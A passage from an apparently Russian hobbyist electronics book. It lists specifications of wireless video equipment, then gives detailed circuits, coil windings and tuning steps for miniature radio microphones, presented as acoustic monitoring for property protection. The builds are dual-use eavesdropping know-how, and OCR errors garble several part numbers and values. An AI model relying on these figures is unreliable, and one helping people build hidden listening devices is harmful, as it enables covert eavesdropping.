На рис. 1.36 изображены блоки приемника и передатчика линии передачи-приема видеоизображения и звука модели WVL-90.
Рабочая частота комплекта составляет от 904 до 928 МГц. Линия в сосотоянни передавать цветное или черно-белое изображение на расстояние от 300 до 900 м, в зависимости от типа используемой антенны (встроенная плоская антенна или внешняя антенна высокого усиления типа WVLA-902), отношение сигнал/шум не менее 45 дБ. Питание от внешнего источника питания - 10-25 В, потребляемый ток передатчика - не менее 50 мА, приемника - не менее 20 мА. Габариты передатчика - 23х6.Зх9.5 см, приемника - 23х70х12 см.
Коммутатор применяется в случае работы одновременно с несколькими видеосигналами. Он передает сигнал одновременно на видеомагнитофон и (или) монитор. Например, коммутатор модели OVS-31 позволяет выводить на монитор сигналы от 4 до 12 видеокамер. Время показа сигнала регулируемое - от 1 до 20 с. Возможно исключение любой камеры из режима просмотра. Питание от сети, габариты - 6,Ох26,5х24,0 см, - вес 3,3 кг. Характеристики одного из мониторов, используемого в подобных линиях, рассмотрим на примере изделия OVS-27. Разрешение - 850 линий, экран с диагональю 25 см, встроенный динамик, частота горизонтальной развертки - 15,625 Гц (15,750 Гц), частота вертикальной развертки 50 Гц (60 Гц), электропитание от сети, амплитуда входного видео@ сигнала - до 2 В, потребляемая мощность - 30 Вт, габариты - 235х220х250 мм, вес - 6,2 кг.
Глава 2. Технические средства защиты объектов
В настоящее время радиолюбительский рынок прочно наводнили устройства, которые используются в системах оповещения и сигнализации. Эти устройства, от самых простых до сложных, собраны, как правило, по стандартным классическим схемам. Данная глава представляет собой обзор широко распространенных радиолюбительских схем устройств, работающих в разрешенных радиолюбительских диапазонах. Проведена попытка классифицировать эти схемы по ряду параметров. Принципиальные схемы сопровождаются описанием их работы и рекомендациями по монтажу и настройке. Все рассматриваемые устройства доступны для повторения начинающими радиолюбителями-конструкторами, не обладающими глубокими теоретическими знаниями в электронике, и могут быть использованы для охраны таких объектов, как дачи, квартиры, офисы, автомобили, контейнеры и т.п. от несанкционированного доступа.
В первом разделе данной главы рассматриваются радиопередающие устройства систем оповещения и сигнализации, позволяющие осуществлять дистанционный акустический контроль охраняемых объектов и использующие в качестве датчиков микрофоны. Возможно использование этих устройств с любыми видами датчиков. В этом разделе приведены описания устройств, как говорят, на все случаи жизни - от простейших и маломощных, работающих в пределах одной квартиры или офиса, до мощных и высокостабильных передатчиков, используемых для охраны дачи или автомобиля, от низкочастотных до высокочастотных, от миниатюрных до крупноразмерых. Этот раздел включает в себя подразделы по вышеперечисленным признакам, поэтому найти описание необходимого устройства не составит большого труда.
Во втором разделе приведены схемы телефонных ретрансляторов, позволяющие использовать общедоступные радиовещательные магнитолы в качестве составной части автоответчиков.
В третьем разделе главы приводятся описания одноканальных систем контроля акустики помещений с дальностью действия от десятков до сотен метров, применяемых для контроля акустики удаленных помещений с целью охраны. Тут же рассмотрены и вибродатчики, способные преобразовывать виброколебания, например, стекла или корпуса автомобиля, и электрические колебания. Чувствительные и узконаправленные микрофоны, используемые для выявления посторонних звуков на территории объектов, можно также использовать для записи голосов птиц н зверей с безопасного расстояния.
В четвертом разделе главы описываются различные радиолюбительские радиоприемные устройства, являющиеся составной частью систем оповещения и сигнализации. Они подразделяются по своему назначению и сложности. Приведены описания приемников, конструктивно выполненных на различной элементной базе, указаны их технические характеристики, даны рекомендации по использованию, монтажу и настройке.
Материал, представленный в данной главе, собран и систематизирован на основе публикаций различных источников, предназначенных для широкого круга читателей. Список используемой литературы представлен в конце книги.
2.1. Радиопередатчики систем оповещения и сигнализации
2.1.1. Миниатюрные радиопередатчики
Миниатюрный радиопередатчик на туннельном диоде
Среди большого семейства радиопередатчиков можно выделить те устройства, которые имеют простое схемное решение, малое количество деталей и при всем этом обладают достаточно хорошими характеристиками. Схема простого микропередатчика изображена на рис. 2.1.
Основу этого устройства составляет схема высокочастотного генератора на туннельном диоде. Ток, потребляемый генератором от источника питания, составляет примерно 15 мА и зависит от типа туннельного диода. Тип туннельного диода может быть выбран, по усмотрению радиолюбителя, с током потребления не более 10-15 мА (например, диод АИ201А).
Генератор сохраняет свою работоспособность при напряжении источника питания 1 В и выше при соответствующем выборе рабочей точки резистором R2. Дроссель Др1 наматывается на резисторе МЛТ 0,25 проводом ПЭВ 0,1 и содержит 200-300 витков. Чтобы провод не соскакивал с резистора, он периодически смазывается клеем "Момент", БФ-2 или другим. Индуктивность дросселя должна быть 100-200 мкГн. Дроссель может быть заводского изготовления. Катушка колебательного контура L1 выполнена без каркаса и содержит 7 витков провода ПЭВ 1,0 мм. Диаметр катушки 8 мм, длина намотки 13 мм. Катушка связи L2 так же, как и L1I - бескаркасная, намотана проводом ПЭВ 0,35 мм, 3 витка, диаметр катушки 2,5 мм, длина намотки - 4 мм. Катушка L2 располагается внутри катушки колебательного контура L1.
Настройка передатчика сводится к установке рабочей точки туннельного диода путем вращения движка подстроечного резистора R2 до появления устойчивой генерации и подстройке частоты колебаний конденсатором С4. Антенной является отрезок монтажного провода длиной примерно в четверть длины волны. Глубину модуляции можно изменить подбором сопротивления резистора К1. Сигнал этого передатчика можно принимать на телевизионный приемник.
Значительно упростить конструкцию радиомикрофона можно при использовании малогабаритных конденсаторных микрофонов, включаемых непосредственно в колебательный контур высокочастотного генератора. Возможная схема такого передатчика представлена на рис. 2.2.
Как известно, конденсаторный микрофон выполнен в виде развернутого конденсатора с двумя плоскими неподвижными электродами, параллельно которым закреплена мембрана (тонкая фольга, металлизированная диэлектрическая пленка и т. п.), электрически изолированная от неподвижных электродов. Выступая элементом контура, конденсаторный микрофон осуществляет частотную модуляцию. В остальном описание схемы и настройка передатчика аналогичны вышеприведенной схеме.
Мощность излучения вышеприведенных устройств, составляет доля единиц мВт. Соответственно, и радиус действия этих устройств составляет единицы - десятки метров.
Микропередатчик с ЧМ на транзисторе
Схема микропередатчика, выполненного на транзисторе, приведена на рис. 2.3.
Модулирующее напряжение, снимаемое с электретного микрофона МКЭ-3 (МКЭ-333, МКЭ-389, М1-А2 "Сосна"), через конденсатор С1 поступает на базу транзистора VT1, на котором выполнен задающий генератор. Так как управляющее напряжение приложено к базе транзистора VT1, то, изменяя напряжение смещения на переходе база-эмиттер, и, соответственно, емкость цепи база-эмиттер, которая является одной из составных частей колебательного контура задающего генератора, осуществляется частотная модуляция передатчика. Этот контур включает в себя также катушку индуктивности L1, расположенную по высокой частоте между базой транзистора VT1 и массой, и конденсаторами СЗ и С4. Конденсатор С4 включен в цепь обратной связи емкостной трехточки, являясь одним из плеч делителя С6 - С4, с которого и снимается напряжение обратной связи. Емкость конденсатора С4 позволяет регулировать уровень возбуждения. Во избежание влияния шунтирующего резистора R2 в цепи эмиттера транзистора VT1 на колебательный контур, которое может вызвать чрезмерное расширение полосы частот резонансной кривой, последовательно с резистором R2 включен дроссель Др1, блокирующий прохождение токов высокой частоты. Индуктивность этого дросселя должна быть около 20 мкГн. Катушка L1 бескаркасная, диаметром 3 мм намотана проводом ПЭВ 0,35 и содержит 7-8 витков.
Для получения максимально возможной мощности необходимо правильно выбрать генерирующий элемент (транзистор VT1) и установить оптимальный режим работы генератора. Для этого необходимо применять транзисторы, верхняя граничная частота которых должна превышать рабочую частоту генератора не менее чем в 7-8 раз. Этому условию наиболее полно отвечают транзисторы типа n-p-n КТЗ68, хотя можно использовать и более распространенные транзисторы КТЗ15 или КТЗ102.
Миниатюрный радиопередатчик с питанием от батареи для электронных часов
Схема следующего радиопередатчика приведена на рис. 2.4.
Устройство содержит минимум необходимых деталей и питается от батарейки для электронных часов напряжением 1,5 В. При столь малом напряжении питания и потребляемом токе 2-3 мА сигнал этого радиомикрофона может приниматься на удалении до 150 м. Продолжительность работы около 24 ч. Задающий генератор собран на транзисторе VT1 типа КТЗ68, режим работы которого по постоянному току задается резистором R1. Частота колебаний задается контуром в базовой цепи транзистора VT1. Этот контур включает в себя катушку L1, конденсатор СЗ и емкость цепи база-эмиттер транзистора VT1, в коллекторную цепь которого в качестве нагрузки включен контур, состоящий из катушки L2 и конденсаторов С6, С7. Конденсатор С5 включен в цепь обратной связи и позволяет регулировать уровень возбуждения генератора. В автогенераторах подобного типа частотная модуляция производится путем изменения потенциалов выводов генерирующего элемента. В чашем случае управляющее напряжение прикладывается к базе транзистора VT1, изменяя тем самым напряжение смещения на переходе база-эмиттер и, как следствие, изменяя емкость перехода базаэмиттер. Изменение этой емкости приводит к изменению резонансной частоты колебательного контура, что и приводит к появлению частотной модуляции. При использовании УКВ приемника импортного производства требуемая величина максимальной девиации несущей частоты составляет 75 кГц (для отечественного стандарта - 50 кГц) и получается при изменении напряжения звуковой частоты на базе транзистора в диапазоне 10-100 мВ. Именно по этому в данной конструкции не используется модулирующий усилитель звуковой частоты. При использовании электретного микрофона с усилителем, например, МКЭ-З, М1-Б2 "Сосна", уровня сигнала, снимаемого непосредственно с выхода микрофона, оказалось достаточно для получения требуемой девиации частоты радиомикрофона. Конденсатор С1 осуществляет фильтрацию колебаний высокой частоты. Конденсатором С7 можно в небольших пределах изменять значение несущей частоты.
Сигнал в антенну поступает через конденсатор С8,емкость которого специально выбрана малой для уменьшения влияния возмущающих факторов на частоту колебаний генератора. Антенна сделана из провода или металлического прутка длинной 60-100 см. Длину антенны можно уменьшить, если между ней и конденсатором С8 включить удлинительную катушку L3 (на рис. 2.4 не показана). Катушки радиомикрофона бескаркасные, диаметром 2,5 мм, намотаны виток к витку. Катушка L1 имеет 8 витков, катушка L2 - 6 витков, катушка L3 - 15 витков провода ПЭВ 0,3. При настройке устройства добиваются получения максимального сигнала высокой частоты, изменяя индуктивности катушек L1 и L2. Подбором конденсатора С7 можно немного изменять величину несущей частоты, в некоторых случаях его можно исключить совсем.
Микропередатчик со стабилизацией тока.
Схема предлагаемого миниатюрного устройства заметно отличается от приведенных выше. Она проста в настройке и изготовлении, позволяет изменять частоту задающего генератора в широких пределах. Устройство сохраняет работоспособность при величине питающего напряжения млше 1 В. Схема радиопередатчика приведена на рис. 2.5.
Генератор высокой частоты собран по схеме мультивибратора с индуктивной нагрузкой. Изменение частоты колебаний высокой частоты происходит при изменении тока, протекающего через транзисторы VT1, VT2 типа КТЗ68. При изменении тока зменяются параметры проводимости транзисторов и их диффузионные емкости, что позволяет варьировать частоту такого генератора в широких пределах без изменения частотозадающих элементов - катушек L1 и L2. Для повышения стабильности частоты и для возможности управления генератором с целью получения частотной модуляции питание последнего осуществляется через стабилизатор тока.
Стабилизатор и модулирующий усилитель выполнены на электретном микрофоне М1 типа МКЭ-З, М1-Б2 "Сосна" и им подобным. При использовании кондиционных деталей уход несущей частоты при изменении напряжения питания с 1,5 до 12 В не превышает 150 кГц (при средней частоте генератора равной 100 МГц).
В схеме используются бескаркасные катушки L1 и L2 диаметром 2,5 мм. Для диапазона 65-108 МГц катушки содержат по 15 витков провода ПЭВ 0,3. Настройка заключается в подгонке частоты путем изменения индуктивности катушек L1 и L2 (сжатием или растяжением). Рассматриваемый генератор может работать на частотах до 2 ГГц, при использовании транзисторов типа КТЗ86, КТЗ101, КТЗ124 и им подобных и при изменении конструкции контурных катушек.
Микропередатчик с ЧМ в диапазоне частот 80-100 МГц.
Схема сверхмаломощного передатчика диапазона 80-100 МГц с частотной модуляцией представлена на рис. 2.6.
Его выходная мощность 0,5 мВт, потребляемый ток не превышает 2 мА. Питание осуществляется от аккумуляторного элемента напряжением 1,5 В.
Задающий генератор УКВ диапазона выполнен на полевом транзисторе VT1 типа КПЗ13А по схеме индуктивной трехточки с использованием проходной емкости МОП-транзистора. В генератор входят элементы VT1, VD1, L1, L2, С2, R3, а также соединительные и общий провода.
Модулирующий сигнал с выхода микрофона М1 через конденсатор С1 и делитель напряжения R1, R2, R3 поступает на варикапную матрицу VD1 типа KBC111А, изменение емкости которой приводит к частотной модуляции задающего генератора. Делитель напряжения на резисторах R1 и R2 служит для установки рабочей точки варикапа VD1. Катушка L1 - бескаркасная, она состоит из 7 витков провода ПЭВ 0,44 с отводом от 3 витка, считая от заземленного вывода. Внутренний диаметр катушки L1 - 4 мм. Катушка L2 содержит 1 виток того же провода, что и катушка L1. Ее нужно разместить соосно катушке L1 и по возможности ближе к ее заземленному выводу. В качестве антенны используется отрезок монтажного провода длиной 0,8 м, который для компактности может быть скручен в спираль.
Настройка передатчика сводится к установке частоты 88-108 МГц путем изменения индуктивности L1. Частоту настройки контролируют по промышленному приемнику. Транзистор генератора должен иметь ток не менее 1-1,5 мА (при замкнутой накоротко катушке L1).
В заключение хотелось бы отметить, что при увеличении напряжения источника питания до 4,5 В выходная мощность высокочастотного генератора возрастет до 10 мВт. При этом для-сохранения девиации частоты рекомендуется подобрать сопротивление резистора R3.
2.1.2. Радиопередатчики малой мощности
Радиопередатчик с ЧМ в УКВ диапазоне частот 61-73 МГц
Радиопередатчик (рис. 2.7) представляет собой однокаскадный УКВ ЧМ передатчик, работающий в вещательном диапазоне 61-73 МГц. Выходная мощность передатчика при использовании источника питания с напряжением 9-12 В - примерно 20 мВт. Он обеспечивает дальность передачи информации около 150 м при использовании приемника с чувствительностью 10 мкВ.
Режимы транзисторов УЗЧ (VT1) и генератора ВЧ (VT2) по постоянному току задаются резисторами КЗ и R4 соответственно. Напряжение 1,2 В на них и на питание микрофона М1 подается с параметрического стабилизатора на К1, С1, VD1. Поэтому устройство сохраняет свою работоспособность при снижении напряжения питания до 4-5 В. При этом наблюдается уменьшение выходной мощности устройства, а несущая частота изменяется незначительно.
Модулирующий усилитель выполнен на транзисторе VT1 типа КТЗ15. Напряжение звуковой частоты на его вход поступает с электретного микрофона с усилителем М1 типа МКЭ-З и ему подобным. Усиленное напряжение звуковой частоты с коллектора транзистора VT1 поступает на варикап VD2 типа КВ109А через фильтр нижних частот на резистор R5 и конденсатор С5, и резистор R7. Варикап VD1 включен последовательно с подстроечным конденсатором С8 в эмнттерную цепь транзистора VT2. Частота колебаний задающего генератора, выполненного на транзисторе VT2 типа КТЗ15 (КТЗ102, КТЗ68), определяется элементами контура L1, С6, С7 и емкостью С8 и VD1.
Вместо светодиода VD1 типа АЛЗО7 можно использовать любой другой светодиод или три последовательно включенных в прямом направлении диода типа КД522 и им подобных. Катушка L1 бескаркасная, диаметром 8 мм, имеет 6 витков провода ПЭВ 0,8.
При налажнаании передатчик настраивают на свободный участок УКВ ЧМ диапазона сжатием или растяжением витков катушки L1 или подстройкой конденсатора С8. Девиация частоты устанавливается конденсатором С8 по наиболее качественному приему на контрольный приемник. Передатчик можно настроить и на вещательный диапазон УКВ ЧМ (88-108 МГц), для этого необходимо уменьшить число витков L1 до 5 и емкость конденсаторов С6 и С7 до 10 пФ. В качестве антенны используется отрезок провода длинной 60 см. Для уменьшения влияния дестабилизирующих факторов антенну можно подключить через конденсатор емкостью 1-2 пФ.
Радиопередатчик с AM в диапазоне частот 27-28 МГц
Устройство, описанное ниже, представляет собой передатчик, работающий в диапазоне 27-28 МГц с амплитудной модуляцией. Дальность действия до 100 м.
Принципиальная схема устройства приведена на рис. 2.8. Передатчик состоит из генератора высокой частоты, собранного на транзисторе VT2 типа КТЗ15, и однокаскадного усилителя звуковой частоты на транзисторе VT1 типа КТЗ15. На вход последнего через конденсатор С1 поступает звуковой сигнал от микрофона М1 типа "Сосна". Нагрузку усилителя составляют резистор КЗ и генератор высокой частоты, включенный между плюсом источника питания и коллектором транзистора VTI. С усилением сигнала напряжение на коллекторе транзистора VT1 изменяется. Этим сигналом и модулируется амплитуда сигнала несущей частоты генератора передатчика, излучаемая антенной.
В конструкции использованы резисторы МЛТ-0,125, конденсаторы - К10-7В. Вместо транзисторов КТЗ15 можно использовать КТЗ102. Катушка L1 намотана на каркасе из полистирола диаметром 7 мм. Она имеет подстроечный сердечник из феррита 600НН диаметром 2,8 мм и длиной 12 мм. Катушка L1 содержит 8 витков провода ПЭВ 0,15 мм. Намотка - виток к витку. Дроссель Др1 намотан на резисторе МТЛ-0,5 сопротивлением более 100 ком. Обмотка дросселя содержит 80 витков ПЭВ 0,1. В качестве антенны используется стальной упругий провод длиной 20 см.
При настройке частоту устанавливают подстройкой индуктивности катушки L1. После регулировки подстроечный сердечник катушки закрепляется парафином.
Радиопередатчик с ЧМ в диапазоне частот 100-108 МГц
Этот радиомикрофон работает в диапазоне 100-108 МГц с частотной модуляцией. Дальность приема сигнала составляет около 50 м. Питание устройства осуществляется от источника питания от 1,5 до 9 В. Принципиальная схема представлена на рис. 2.9.
Передатчик состоит из однокаскадного усилителя звуковой частоты и однокаскадного генератора высокой частоты. Задающий генератор собран по распространенной схеме. Частота несущей определяется элементами С4, L1, С5 и межэлектродными емкостями транзистора VT2. Модулирующий усилитель выполнен на транзисторе VT1 типа КТЗ15. Усиленный сигнал через конденсатор С2 поступает на эмиттер транзистора VT2 типа КТЗ15. Модулирующее напряжение вызывает изменение емкости перехода база-эмиттер транзистора VT2 и, тем самым, осуществляет частотную модуляцию задающего генератора. Сигнал с генератора через конденсатор С6 поступает в антенну, в качестве которой используется отрезок провода длиной 10-40 см.
Катушка L1 бескаркасная, намотана на оправке диаметром 3 мм и содержит 4 витка провода ПЭВ 0,6 мм, шаг намотки 2 мм.
Настройка радиомикрофона заключается в сжатии или растяжении витков катушки L1 для приема сигнала в свободном от вещательных станций участке УКВ диапазона вещательного приемника.
2.1.3. Радиопередатчики средней мощности
Радиопередатчик с широкополосной ЧМ в диапазоне частот 65-108 МГц
Радиомикрофон, принципиальная схема которого приведена на рис. 2.10, работает в диапазоне частот 65-108 МГц с широкополосной частотной модуляцией. Это позволяет принимать сигнал с радиомикрофона на обычный ЧМ приемник этого диапазона. Дальность действия достигает 150-200 м. Продолжительность работы с батареей типа "КРОНА" - около 10 ч.
Низкочастотные колебания с выхода микрофона М1 (типа МКЭ-3, М1-Б2 "Сосна" и им подобных) через конденсатор С1 поступают на усилитель звуковой частоты, выполненный на транзисторе VT1 типа КТЗ15. Усиленный сигнал звуковой частоты, снимаемый с коллектора транзистора VT1, через дроссель Др1 воздействует на варикап VD1 (типа КВ109А), который осуществляет частотную модуляцию радиосигнала, сформированного высокочастотным генератором.
Генератор ВЧ собран на транзисторе VT2 типа КТЗ15. Частота этого генератора зависит от параметров контура L1, СЗ, С4, С5, С6, VD1. Сигнал ВЧ, снимаемый с коллектора транзистора VT2, усиливается усилителем мощности на транзисторе VT3 типа КТЗ61. Усилитель мощности имеет гальваническую связь с задающим генератором. Усиленное высокочастотное напряжение выделяется на дросселе Др2 и поступает на П-образный контур, выполненный на элементах С11, L2, С10. Последний настроен на пропускание основного сигнала п подавление множества гармоник, возникающих на коллекторе транзистора VT3. Радиомикрофон собран на плате размером ЗОх70 мм.
В качестве антенны используется отрезок монтажного провода длиной 25 см. Все детали малогабаритные. Резисторы - типа МЛТ-0,125, конденсаторы - К50-35, КМ, КД. Вместо ваpикаpа VD1 типа КВ109А можно использовать варикапы с другим буквенным индексом иди варикап типа КВ102. Транзисторы могут иметь любой буквенный индекс. Транзисторы VT1 и VT2 можно заменить на КТЗ102, КТЗ68, а транзистор VT3 - на КТЗ26, КТЗ107, КТЗбЗ. Дроссели Др1 и Др2 намотаны на резисторах МЛТ-0,25 сопротивлением более 100 ком проводом ПЭВ 0,1 по 60 витков каждый. Катушки L1 и L2 бескаркасные, диаметром 5 мм. Катушка L1 - 3 витка, катушка L2 - 13 витков провода ПЭВ 0.3.
Настройка сводится к установке частоты задающего генератора, соответствующей свободному участку УКВ ЧМ диапазона, изменением емкости подстроечного конденсатора. Растяжением или сжатием витков катушки L2 настраивается передатчик на максимальную мощность ВЧ сигнала.
Радиопередатчик средней мощности с компактной рамочной антенной
Устройство работает в диапазоне 65-73 МГц с частотной модуляцией. Дальность действия при использовании рамочной компактной антенны составляет около 150 м. Продолжительность работы устройства при использовании батареек "Крона" составляет 30 ч. Принципиальная схем@ радиопередатчика представлена на рис. 2.11.
Низкочастотный сигнал микрофона М1 типа МКЭ-З, "Сосна" и др. усиливается двухкаскадным усилителем низкой частоты с непосредственными связями. Усилитель выполнен на транзисторах VT1 и VT2 типа КТЗ15. Режим работы усилителя устанавливается резистором R2.
Задающий генератор устройства выполнен на транзисторе VT3 типа КТЗ15. Частотозадающий контур подключается к базе транзистора VT3 через конденсатор С6 небольшой емкости. Конденсаторы С8, С9 образуют цепь обратной связи. Контур генератора состоит из индуктивности L1, конденсатора С5 и двух, включенных встречно, диодов типа КД102. Под действием модулирующего напряжения емкости диодов VD1, VK2 изменяются. Таким образом, осуществляется частотная модуляция передатчика. С выхода генератора модулированный .сигнал подается на усилитель мощности. Выходной усилитель выполнен на транзисторе VT4 типа КТЗ15. Он работает с высоким КПД в режиме класса "С". Усиленный сигнал поступает в рамочную антенну, выполненную в виде спирали. Спираль может быть любой формы, важно только, чтобы общая длина провода составляла 85-100 см, диаметр провода 1 мм.
Дроссели Др1, Др2 - любые, с индуктивностью около 30 мкГн. Катушки L1, L2, L3, L4, L5 - бескаркасные, диаметром 10 мм. Катушка L1 имеет 7 витков, L2 и L4 - по 4 витка, L3 и L5 - по 9 витков. Все катушки намотаны проводом ПЭВ 0,8 мм. Настройка передатчика особенностей не имеет.
Радиопередатчик УКВ ЧМ диапазона с дальностью действия 300 м
Этот передатчик при весьма малых размерах позволяет передавать информацию на расстоянии до 300 м. Прием сигнала может вестись на любой приемник УКВ ЧМ диапазона. Для питания может быть использован любой источник питания с напряжением 5-15 В. Схема передатчика приведена на рис. 2.12.
Задающий генератор передатчика выполнен на полевом транзисторе VT2 типа КП 303. Частота генерации определяется элементами L1, С5, С3, VD2. Частотная модуляция осуществляется путем подачи модулирующего напряжения звуковой частоты на варикап VD2 типа КВ109. Рабочая точка варикапа задается напряжением, поступающим через резистор R2 со стабилизатора напряжения. Стабилизатор включает в себя генератор стабильного тока на полевом транзисторе VT1 типа КП103, стабилитрон VD1 типа КС147А и конденсатор С2.
Усилитель мощности выполнен на транзисторе VT3 типа КТЗ68. Режим работы усилителя задается резистором R4. В качестве антенны используется отрезок провода длиной 15-50 см. Дроссели Др1 и Др2 могут быть любые, с индуктивностью 10-150 мГн. Катушки L1 и L2 наматываются на полистироловых каркасах диаметром 5 мм с подстроечными сердечниками 100 ВЧ или 50 ВЧ. Количество витков - 3,5 с отводом от середины, шаг намотки 1 мм, провод ПЭВ 0,5 мм. Вместо транзистора КП 303 можно использовать КП 302, КП 307. Настройка заключается в установке необходимой частоты генератора конденсатором С5, получения максимальной выходной мощности путем подбора сопротивления резистора R4 и подстройке резонансной частоты контура конденсатором С10.
2.1.4. Радиопередатчики большой мощности
Мощный высокочастотный радиопередатчик с ЧМ в диапазоне частот 65-108 МГц
Устройство (рис. 2.13), описанное ниже, работает в диапазоне 65-108 МГц с частотной модуляцией. Дальность действия около 100 м при использовании компактной антенны. При использовании штыревой антенны дальность может достигать 500-600 м.
Сигнал от электретного микрофона М1 типа МКЭ-3 поступает на двухкаскадный низкочастотный усилитель с непосредственными связями на транзисторах VT1, VT2 типа КТЗ15. Рабочая точка усилителя устанавливается автоматически цепью обратной связи по постоянному току через R5, R6, С3. Усиленный низкочастотный сигнал с коллектора транзистора VT2 через фильтр низкой частоты на элементах R9, С4 и резистор R10 поступает на варикап VD1 типа КВ109, включенный в эмиттерную цепь транзистора VT3 типа КТ904.
Напряжение смещения на варикап VD1 задается коллекторным напряжением транзистора VT2. Однокаскадный ВЧ генератор выполнен на транзисторе VT3. Напряжение смещения на базе этого транзистора задается резистором R11. Транзистор VT3 включен по схеме с общей базой. В его коллекторной цепи включен контур С8, С9, L1. Частота настройки генератора определяется индуктивностью катушки L1 и емкостями С8, С5, VD1. Конденсатор С9 устанавливает глубину обратной связи, а конденсатор С10 согласует контур с антенной.
Все детали передатчика малогабаритные. Дроссель Др1 типа ДПМ 0,1 на 60 мкГн. Его можно заменить на самодельный, намотанный на резисторе МЛТ-0,25 сопротивлением более 100 ком проводом ПЭВ 0.1 100 витков. Катушка L1 - бескаркасная, с внутренним диаметром 8 мм, имеет 7 витков провода ПЭВ 0,8 мм. Компактная катушечная антенна выполнена тем же проводом, ее общая длина составляет 50 см. Катушка имеет диаметр 3 см. Если используется обычная антенна, то это провод или штырь длиной 0,75-1,0 м.
При настройке конденсатором С8 настраивают радиомикрофон на свободный участок УКВ ЧМ диапазона. Конденсаторами С9 и С10 настраивают генератор на максимальную дальность связи. Мощность передатчика составляет около 200 мВт. Если такая мощность не нужна, то ее легко понизить, увеличив вместе с тем срок службы источника питания. Для этого нужно увеличить сопротивление резистора R11 до 68-100 ком и заменить дроссель Др1 на постоянный резистор сопротивлением 180-330 Ом. Так как в этом случае мощность радиомикрофона будет около 10 мВт, то транзистор VT3 можно заменить на КТ315 или КТ3102. Транзисторы VT1, VT2 могут быть заменены на КТ3102, а транзистор VT3 - на КТ606, КТ907.
Для питания устройства используется батарея на 9 В типа "Крона", "Корунд" или аккумулятор 7Д-0,15.
В связи с тем, что мощные высокочастотные генераторы имеют низкую стабильность частоты, что приводит к ухудшению помеховой обстановки в целом, в данной главе более подробно описаны радиопередатчики большой мощности с кварцевой стабилизацией частоты (см. раздел 2.1.7).
2.1.5. Радиопередатчики малой мощности с повышенной стабильностью частоты
Радиопередатчик с узкополосной ЧМ в диапазоне частот 140-150 МГц
Радиопередатчик, схема которого представлена на рис. 2.14, работает в диапазоне 140-150 МГц с узкополосной частотной модуляцией. Девиация частоты - 3 кГц. Частота задающего генератора стабилизирована кварцевым резонатором. В качестве акустического преобразователя используется электретный микрофон М1 с усилителем типа МКЭ-З, "Сосна", МЭК-1, и др. Питание на микрофон поступает через RC-фильтр, состоящий из резистора R1 и конденсатора С1. Напряжение звуковой частоты с выхода микрофона М1 через разделительный конденсатор С2 поступает на вход усилителя звуковой частоты (база транзистора VT1).
Усилитель звуковой частоты собран по двухкаскадной схеме с активными элементами на транзисторах VT1 и VT2 типа КТ315. Он усиливает и ограничивает звуковой сигнал до необходимой амплитуды. Режимы работы транзисторов VT1, VT2 по постоянному току устанавливаются путем подбора сопротивления резистора RЗ.
Заданный режим поддерживается далее автоматически с помощью обратной связи между транзисторами VT1 и VT2. Усиленный и ограниченный сигнал звуковой частоты через RC-фильтр низкой частоты, выполненный на резисторах К6, К8 и конденсаторе С4, поступает на варикап VD1 типа КВ109. Под действием переменного напряжения изменяется емкость варикапа VD1, осуществляя тем самым частотную модуляцию. Постоянное напряжение, снимаемое с коллектора транзистора VT2, задает начальное смещение на варикапе VD1. Задающий генератор выполнен на транзисторе VT3 типа КТЗ68, КТЗ101. Режим транзистора VT3 по постоянному току определяет резистор R9 в его базовой цепи. Кварцевый резонатор ZQ1 используется на частоту 47-49 МГц. Контур в коллекторной цепи транзистора VT3 настроен на частоту третьей гармоники используемого кварцевого резонатора. Высокочастотный сигнал поступает в антенну через конденсатор малой емкости С8. В качестве антенны используется отрезок провода длинной 40-50 см. Катушка L1 наматывается проводом ПЭВ 0,6 мм на корпусе подстроечного конденсатора С7 и содержит 3-4 витка.
Выводы катушки припаиваются к выводам конденсатора. Настройка усилителя звуковой частоты заключается в подборе сопротивления резистора КЗ так, чтобы получить на коллекторе транзистора VT2 напряжение, равное примерно половине напряжения источника питания. Контур L1, С7 настраивается по максимуму излучаемой мощности путем подстройки конденсатора С7.
Радиопередатчик с высокой стабильностью несущей частоты
При использовании кварцевого резонатора с высокой частотой появляется возможность создать простой радиомикрофон с высокой стабильностью несущей частоты. Ниже приведено описание подобного устройства. Радиомикрофон работает в диапазоне 61-74 МГц с частотной модуляцией.
Принципиальная схема передатчика радиопередатчика приведена на рис. 2.15.
Сигнал с микрофона М1 типа МКЭ-3 усиливается двухкаскадным усилителем на транзисторах VT1, VT2 типа КТ315. Задающий генератор выполнен на транзисторе VT3 типа КТЗ68. Частотная модуляция несущей частоты обеспечивается варикапом VD2. Резисторы R6 и R7 в базовой цепи транзистора VT3 определяют его режим по постоянному току.
Конденсатор С9 устанавливает необходимый режим генерации, обеспечивая положительную обратную связь. Стабильность частоты генератора зависит в основном от напряжения питания. Чтобы ее повысить, необходимо использовать стабилизатор на 6-9 В, что приведет к усложнению схемы. Стабилизировать частоту можно и другим способом. Если быть точным, то причина нестабильности несущей частоты определяется в основном колебаниями рабочей точки транзистора VT2 усилителя звукорой частоты при изменении напряжения питания. Положение этой рабочей точки определяет напряжение обратного смещения на варикапе VD2, а значит, и его начальную емкость. Для стабилизации рабочей точки усилителя на транзисторе VT2 в его базовую цепь включен резистор R4, напряжение на который поступает с параметрического стабилизатора, собранного на резисторе R2, светодиоде VD1 и конденсаторе С1. В устройстве использованы постоянные резисторы МЛТ-0,125, конденсаторы типов К50-16 и КМ.
Дроссели Др1, Др2 можно использовать стандартные, например, типа Д-0,1, с индуктивностью 15-30 мкГн или изготовить самостоятельно. Дроссели наматываются на резисторах МЛТ-0,25 сопротивлением более 100 ком и содержат 50-60 витков провода ПЭВ 0,1 мм. Контурная катушка L1 намотана на каркасе диаметром 8 мм и содержит 6 витков провода ПЭВ 0,8 мм. Катушка L2 намотана на том же каркасе и тем же проводом, что и катушка L1. Катушка L2 содержит 3 витка, размещенных на расстоянии 1 мм от витков катушки L1. Антенна выполнена следующим образом: отрезок 50-омного кабеля длиной 10-12 см зачищается от изоляции и удаляется центральная жила. По всей длине отрезка кабеля наматывается виток к витку провод ПЭВ-0,6 - антенна готова. В крайнем случае в качестве антенны можно использовать провод длиной 30-50 см.
Настройку начинают с усилителя звуковой частоты. Изменением сопротивления резистора R4 устанавливают напряжение на коллекторе транзистора VT2, равное половине напряжения источника питания. Емкость конденсатора С9 необходимо подобрать по максимуму тока, потребляемому генератором, а затем резистором К6 установить этот ток около 10 мА.
2.1.6. Радиопередатчик средней мощности с повышенной стабильностью частоты
Радиопередатчик с высокой стабильностью частоты задающего генератора
